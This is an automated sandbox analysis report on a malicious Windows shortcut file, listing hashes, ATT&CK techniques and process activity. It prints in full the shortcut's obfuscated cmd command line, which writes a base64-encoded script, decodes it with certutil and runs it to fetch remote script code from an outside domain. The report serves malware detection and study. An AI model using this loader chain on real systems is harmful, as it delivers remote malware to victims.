21c008bd8238c5da1f9675f8eb164662ed91432db8fe0a67fcdaa85280377c33

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2023 12:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CRLVDIGITAL2022x_787.55508767.468735.53105.lnk
Size

497B
MD5

e9ac76f6fdf0da6f8d53f7679a13c0ba
SHA1

b0d832dadeb1f6e6053fc14112596fafea7bad85
SHA256

fd714dc8d476489ad14c28718c043f9c15d008ea994cf3c997ea5105815dbb1f
SHA512

a4e75e0bdeedcf5f23bdb861d193c0a98cb32e701ec897ec98ac557beb9729828c8cdd02dc04d1b21910142ae8ba095421ea72bbfe84408093333062166efb2e

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4336	conhost.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 4336	2072	cmd.exe	82
PID 2072 wrote to memory of 4336	2072	cmd.exe	82
PID 4336 wrote to memory of 2176	4336	conhost.exe	83
PID 4336 wrote to memory of 2176	4336	conhost.exe	83

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\CRLVDIGITAL2022x_787.55508767.468735.53105.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "MD C:obLBL6\>nul&&s^eT PFOC=C:obLBL6\^EobLBL6&&echo dmFyIENPcmk9InNjIisiciI7RE9yaT0iaXAiKyJ0OmgiO0VPcmk9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDT3JpK0RPcmkrRU9yaSsiLy80d2VlZWguZGtnaXJ0YWJjdnB3aGdoZGsuaG9tZXMvPzEvIik7>!PFOC!.^Js&&certutil -f -decode !PFOC!.^Js !PFOC!.^Js&&CMD /c !PFOC!.^Js"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "MD C:obLBL6\>nul&&s^eT PFOC=C:obLBL6\^EobLBL6&&echo dmFyIENPcmk9InNjIisiciI7RE9yaT0iaXAiKyJ0OmgiO0VPcmk9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDT3JpK0RPcmkrRU9yaSsiLy80d2VlZWguZGtnaXJ0YWJjdnB3aGdoZGsuaG9tZXMvPzEvIik7>!PFOC!.^Js&&certutil -f -decode !PFOC!.^Js !PFOC!.^Js&&CMD /c !PFOC!.^Js"
    3⤵
    PID:2176

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CRLVDIGITAL2022x_787.55508767.468735.53105.lnk

Filesize
1KB

MD5
36c5f77f861b2901c95c651adc99da85

SHA1
907a4ef1bf94ec34915097ec9749350085994303

SHA256
745b6b5471453f3794562a7016f257d4065cfc73404c8ad6cb9f3b6aeac8cb0e

SHA512
c11dd9db7c407e90d345b3d9aa1b7c6378b125397c8dd1d81f148894d2b6e49fb4d30935d3e8872fd5f29939f5a66920b14e1d58cac89e2e383c30bfaf0c368b

Download Submit
memory/2176-133-0x0000000000000000-mapping.dmp

Download
memory/4336-132-0x0000000000000000-mapping.dmp

Download